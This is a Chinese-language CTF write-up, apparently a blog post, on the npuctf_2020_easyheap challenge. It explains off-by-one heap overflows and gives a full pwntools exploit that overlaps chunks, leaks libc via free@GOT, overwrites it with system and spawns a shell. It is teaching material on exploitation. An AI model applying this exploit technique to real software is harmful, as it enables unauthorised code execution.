npuctf_2020_easyheap---->off-by-one

Off-by-One 漏洞分析与利用

概述

在刷 BUU 题目时遇到了两道 off-by-one 题目,这里记录一下学习过程。off-by-one 漏洞主要分为两种情况:

off-by-one:单字节溢出,且该字节可控
off-by-null:单字节溢出,但只能溢出 \x00

这两次遇到的都是 off-by-one,一般做法是利用溢出的字节修改 chunk 的 size 位,从而造成堆块重叠。
基础 Off-by-One 分析

假设存在以下代码:

#include<stdio.h>
#include<stdlib.h>
#include<string.h>

int main(){
    char *ptr1 = malloc(0x10);
    char *ptr2 = malloc(0x10);
    read(0,ptr1,0x10+1);
    free(ptr1);
    free(ptr2);
    ptr1 = 0;
    ptr2 = 0;
    return 0;
}

在第 8 行:read(0,ptr1,0x10+1); 可以多读取一个字节,导致单字节溢出。
调试过程

assembly

pwndbg> disas main
Dump of assembler code for function main:
   0x0000000000401176 <+0>:     endbr64
   0x000000000040117a <+4>:     push   rbp
   0x000000000040117b <+5>:     mov    rbp,rsp
   0x000000000040117e <+8>:     sub    rsp,0x10
   0x0000000000401182 <+12>:    mov    edi,0x10
   0x0000000000401187 <+17>:    call   0x401080 <malloc@plt>
   0x000000000040118c <+22>:    mov    QWORD PTR [rbp-0x8],rax
   0x0000000000401190 <+26>:    mov    edi,0x10
   0x0000000000401195 <+31>:    call   0x401080 <malloc@plt>
   0x000000000040119a <+36>:    mov    QWORD PTR [rbp-0x10],rax
   0x000000000040119e <+40>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004011a2 <+44>:    mov    edx,0x11
   0x00000000004011a7 <+49>:    mov    rsi,rax
   0x00000000004011aa <+52>:    mov    edi,0x0
   0x00000000004011af <+57>:    mov    eax,0x0
   0x00000000004011b4 <+62>:    call   0x401070 <read@plt>
   0x00000000004011b9 <+67>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004011bd <+71>:    mov    rdi,rax
   0x00000000004011c0 <+74>:    call   0x401060 <free@plt>
   0x00000000004011c5 <+79>:    mov    rax,QWORD PTR [rbp-0x10]
   0x00000000004011c9 <+83>:    mov    rdi,rax
   0x00000000004011cc <+86>:    call   0x401060 <free@plt>
   0x00000000004011d1 <+91>:    mov    QWORD PTR [rbp-0x8],0x0
   0x00000000004011d9 <+99>:    mov    QWORD PTR [rbp-0x10],0x0
   0x00000000004011e1 <+107>:   mov    eax,0x0
   0x00000000004011e6 <+112>:   leave
   0x00000000004011e7 <+113>:   ret
End of assembler dump

将断点下在 0x00000000004011b4 查看 chunk:

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x405000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x405290
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x4052b0
Size: 0x20 (with flag bits: 0x21)

Top chunk | PREV_INUSE
Addr: 0x4052d0
Size: 0x20d30 (with flag bits: 0x20d31)

====================== vis =================================
0x405290        0x0000000000000000      0x0000000000000021      ........!.......
0x4052a0        0x0000000000000000      0x0000000000000000      ................
0x4052b0        0x0000000000000000      0x0000000000000021      ........!.......
0x4052c0        0x0000000000000000      0x0000000000000000      ................

输入之前的状态,输入之后:

pwndbg> cyclic 16
aaaaaaaabaaaaaaa
pwndbg> ni
aaaaaaaabaaaaaaaq  # 多输入了一个 q

============== vis =======================
0x405290        0x0000000000000000      0x0000000000000021      ........!.......
0x4052a0        0x6161616161616161      0x6161616161616162      aaaaaaaabaaaaaaa
0x4052b0        0x0000000000000071      0x0000000000000021      q.......!.......
0x4052c0        0x0000000000000000      0x0000000000000000      ................

发现将 q 输入到了 chunk2 的 prev_size 字段,这是一个有用的溢出,但"杀伤力"有限。
利用 Off-by-One 修改 Size

如果能够将输入覆盖到 chunk 的 size 位,就可以修改 size 进而造成 chunk 重叠。

在堆机制中,当我们申请一个不被 0x10 整除的 chunk(64位),比如 0x18,会把下一个 chunk 的 prev_size 复用,作为当前 chunk 的 data 段来填写数据。

将源代码修改为:
c

char *ptr1 = malloc(0x18);
read(0,ptr1,0x18+1);

再次调试:

pwndbg> b *0x00000000004011b4
Breakpoint 2 at 0x4011b4
pwndbg> c

============= heap ===========
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x405000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x405290
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x4052b0
Size: 0x20 (with flag bits: 0x21)

Top chunk | PREV_INUSE
Addr: 0x4052d0
Size: 0x20d30 (with flag bits: 0x20d31)

============= vis ============
0x405290        0x0000000000000000      0x0000000000000021      ........!.......
0x4052a0        0x0000000000000000      0x0000000000000000      ................
0x4052b0        0x0000000000000000      0x0000000000000021      ........!.......
0x4052c0        0x0000000000000000      0x0000000000000000      ................

输入:

pwndbg> cyclic 24
aaaaaaaabaaaaaaacaaaaaaa
pwndbg> ni
aaaaaaaabaaaaaaacaaaaaaaq

========== vis =================
0x405290        0x0000000000000000      0x0000000000000021      ........!.......
0x4052a0        0x6161616161616161      0x6161616161616162      aaaaaaaabaaaaaaa
0x4052b0        0x6161616161616163      0x0000000000000071      caaaaaaaq.......
0x4052c0        0x0000000000000000      0x0000000000000000      ................

可以看到,这里把 size 修改成了 q 的 ASCII 值,轻松造成了 chunk overlap。

CTF 实例分析:npuctf_2020_easyheap

环境准备

bash

❯ pwninit npuctf_2020_easyheap
[INFO] 当前已在虚拟环境中: ctf
[INFO] 给二进制文件添加执行权限...
[SUCCESS] 权限添加成功: npuctf_2020_easyheap

[INFO] 检查二进制文件保护:
==================================

[*] '/mnt/d/pwn/PROJECT/BUUCTF/npuctf_2020_easyheap_/npuctf_2020_easyheap'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)

    Stripped:   No
==================================

仅开启 Canary 和 NX,题目提示是 Ubuntu 18.04,使用 libc 2.27:
bash

❯ clibc npuctf_2020_easyheap 2.27
Creating backup: npuctf_2020_easyheap.bak
Available glibc versions:

    1. 2.27-3ubuntu1.5_amd64
    2. 2.27-3ubuntu1.6_amd64
    3. 2.27-3ubuntu1_amd64
       Select (1-3): 3
       Success: Patched npuctf_2020_easyheap with 2.27-3ubuntu1_amd64

程序分析

Create 函数
unsigned __int64 create()
{
  __int64 v0; // rbx
  int i; // [rsp+4h] [rbp-2Ch]
  size_t size; // [rsp+8h] [rbp-28h]
  char buf[8]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v5; // [rsp+18h] [rbp-18h]

  v5 = __readfsqword(0x28u);
  for ( i = 0; i <= 9; ++i )
  {
    if ( !*((_QWORD *)&heaparray + i) )
    {
      *((_QWORD *)&heaparray + i) = malloc(0x10uLL);
      if ( !*((_QWORD *)&heaparray + i) )
      {
        puts("Allocate Error");
        exit(1);
      }
      printf("Size of Heap(0x10 or 0x20 only) : ");
      read(0, buf, 8uLL);
      size = atoi(buf);
      if ( size != 24 && size != 56 )
        exit(-1);
      v0 = *((_QWORD *)&heaparray + i);
      *(_QWORD *)(v0 + 8) = malloc(size);
      if ( !*(_QWORD *)(*((_QWORD *)&heaparray + i) + 8LL) )
      {
        puts("Allocate Error");
        exit(2);
      }
      **((_QWORD **)&heaparray + i) = size;
      printf("Content:");
      read_input(*(_QWORD *)(*((_QWORD *)&heaparray + i) + 8LL), size);
      puts("Done!");
      return __readfsqword(0x28u) ^ v5;
    }
  }
  return __readfsqword(0x28u) ^ v5;
}


创建一个 0x10 大小的 chunk,用于存放 size 和 content_addr 信息。
Edit 函数

unsigned __int64 edit()
{
  int v1; // [rsp+0h] [rbp-10h]
  char buf[4]; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4uLL);
  v1 = atoi(buf);
  if ( (unsigned int)v1 >= 0xA )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *((_QWORD *)&heaparray + v1) )
  {
    printf("Content: ");
    read_input(*(_QWORD *)(*((_QWORD *)&heaparray + v1) + 8LL), **((_QWORD **)&heaparray + v1) + 1LL);
    // 注意:这里把 size 取出来之后还 +1 了,存在 off-by-one 漏洞
    puts("Done!");
  }
  else
  {
    puts("How Dare you!");
  }
  return __readfsqword(0x28u) ^ v3;
}


Show 函数

unsigned __int64 show()
{
  int v1; // [rsp+0h] [rbp-10h]
  char buf[4]; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4uLL);
  v1 = atoi(buf);
  if ( (unsigned int)v1 >= 0xA )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *((_QWORD *)&heaparray + v1) )
  {
    printf(
      "Size : %ld\nContent : %s\n",
      **((_QWORD **)&heaparray + v1),
      *(const char **)(*((_QWORD *)&heaparray + v1) + 8LL));
    // 这里会把原来程序创建出来存放数据的 chunk 的 content_addr 的内容打印出来
    puts("Done!");
  }
  else
  {
    puts("How Dare you!");
  }
  return __readfsqword(0x28u) ^ v3;
}

漏洞利用思路

利用 off-by-one 造成 chunk overlap

利用 show 函数泄漏 libc(通过修改 content_addr 为 free@GOT)

计算 libc 基地址和 system 地址

修改 free@GOT 为 system

删除包含 "/bin/sh" 的 chunk 获取 shell

利用过程
步骤 1:创建三个 chunk
python

def exp():
    add(24, b'source')
    add(24, b'aaaa')
    add(24, b'bbbb')

堆布局:
text

[+] ============ HEAP ============[+]
Allocated chunk | PREV_INUSE
Addr: 0x3c533000
Size: 0x250 (with flag bits: 0x251)

Allocated chunk | PREV_INUSE
Addr: 0x3c533250
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x3c533270
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x3c533290
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x3c5332b0
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x3c5332d0
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x3c5332f0
Size: 0x20 (with flag bits: 0x21)

Top chunk | PREV_INUSE
Addr: 0x3c533310
Size: 0x20cf0 (with flag bits: 0x20cf1)

[+] ============= VIS ==============[+]
0x3c533250	0x0000000000000000	0x0000000000000021	........!.......
0x3c533260	0x0000000000000018	0x000000003c533280	.........2S<....
0x3c533270	0x0000000000000000	0x0000000000000021	........!.......
0x3c533280	0x000a656372756f73	0x0000000000000000	source..........
0x3c533290	0x0000000000000000	0x0000000000000021	........!.......
0x3c5332a0	0x0000000000000018	0x000000003c5332c0	.........2S<....
0x3c5332b0	0x0000000000000000	0x0000000000000021	........!.......
0x3c5332c0	0x0000000a61616161	0x0000000000000000	aaaa............
0x3c5332d0	0x0000000000000000	0x0000000000000021	........!.......
0x3c5332e0	0x0000000000000018	0x000000003c533300	.........3S<....
0x3c5332f0	0x0000000000000000	0x0000000000000021	........!.......
0x3c533300	0x0000000a62626262	0x0000000000000000	bbbb............
0x3c533310	0x0000000000000000	0x0000000000020cf1	................ <-- Top chunk

步骤 2:修改 chunk0 造成溢出

python

edit(0, b'/bin/sh\x00' + p64(0)*2 + p8(0x41))

修改后的堆布局:
text

[+] =================== VIS ============= [+]
0x26bae250	0x0000000000000000	0x0000000000000021	........!.......
0x26bae260	0x0000000000000018	0x0000000026bae280	...........&....
0x26bae270	0x0000000000000000	0x0000000000000021	........!.......
0x26bae280	0x0068732f6e69622f	0x0000000000000000	/bin/sh.........
0x26bae290	0x0000000000000000	0x0000000000000041	........A.......
0x26bae2a0	0x0000000000000018	0x0000000026bae2c0	...........&....
0x26bae2b0	0x0000000000000000	0x0000000000000021	........!.......
0x26bae2c0	0x0000000a61616161	0x0000000000000000	aaaa............
0x26bae2d0	0x0000000000000000	0x0000000000000021	........!.......
0x26bae2e0	0x0000000000000018	0x0000000026bae300	...........&....
0x26bae2f0	0x0000000000000000	0x0000000000000021	........!.......
0x26bae300	0x0000000a62626262	0x0000000000000000	bbbb............
0x26bae310	0x0000000000000000	0x0000000000020cf1	................ <-- Top chunk

现在 head_chunk1 的 size 变成了 0x41,包含了 chunk1 的整个区域。
步骤 3:删除并重新申请 chunk1
python

delete(1)
add(56, p64(0)*3 + p64(0x21) + p64(0x38) + p64(free_got))

修改后的堆布局:

text

[+] ============= VIS ============ [+]
0x26748250	0x0000000000000000	0x0000000000000021	........!.......
0x26748260	0x0000000000000018	0x0000000026748280	..........t&....
0x26748270	0x0000000000000000	0x0000000000000021	........!.......
0x26748280	0x0068732f6e69622f	0x0000000000000000	/bin/sh.........
0x26748290	0x0000000000000000	0x0000000000000041	........A.......
0x267482a0	0x0000000000000000	0x0000000000000000	................
0x267482b0	0x0000000000000000	0x0000000000000021	........!.......
0x267482c0	0x0000000000000038	0x0000000000602018	8........ `.....
0x267482d0	0x000000000000000a	0x0000000000000021	........!.......
0x267482e0	0x0000000000000018	0x0000000026748300	..........t&....
0x267482f0	0x0000000000000000	0x0000000000000021	........!.......
0x26748300	0x0000000a62626262	0x0000000000000000	bbbb............
0x26748310	0x0000000000000000	0x0000000000020cf1	................ <-- Top chunk

成功将 content_addr 修改为 free@GOT。

步骤 4:泄漏 libc 并计算地址

python

show(1)
libc_base = uu64(ru(b'\x7f')[-6:]) - libc.sym.free
system = libc_base + libc.sym.system

步骤 5:修改 free@GOT 并触发

python

edit(1, p64(system))
delete(0)  # 此时 free("/bin/sh") 变为 system("/bin/sh")

完整 EXP

python

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')
binary = "npuctf_2020_easyheap"

if args.get("REMOTE"):
    io = remote("127.0.0.1", 8080)
else:
    io = process(binary)

elf = ELF(binary)
libc = ELF("/home/source/tools/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6")

def add(size, content):
    sla('Your choice :', '1')
    sla('Size of Heap(0x10 or 0x20 only) : ', str(size))
    sla('Content:', content)

def delete(idx):
    sla('Your choice :', '4')
    sla('Index :', str(idx))

def show(idx):
    sla('Your choice :', '3')
    sla('Index :', str(idx))

def edit(idx, content):
    sla('Your choice :', '2')
    sla('Index :', str(idx))
    sla("Content: ", content)

def exp():
    free_got = elf.got.free
    add(24, b'source')
    add(24, b'aaaa')
    add(24, b'bbbb')
    edit(0, b'/bin/sh\x00' + p64(0)*2 + p8(0x41))
    delete(1)
    add(56, p64(0)*3 + p64(0x21) + p64(0x38) + p64(free_got))
    

    show(1)
    libc_base = uu64(ru(b'\x7f')[-6:]) - libc.sym.free
    system = libc_base + libc.sym.system
    
    edit(1, p64(system))
    delete(0)

exp()
itr()

并且最终成功拿到flag

bin
boot
dev
etc
flag
flag.txt
home
lib
lib32
lib64
media
mnt
opt
proc
pwn
root
run
sbin
srv
sys
tmp
usr
var
[DEBUG] Received 0x2b bytes:
    b'flag{3aed5904-6a30-4f3e-860d-cc94749bdae9}\n'
flag{3aed5904-6a30-4f3e-860d-cc94749bdae9}
$
posted @ 2025-10-26 00:32  SourceSource  阅读(13)  评论(0)    收藏  举报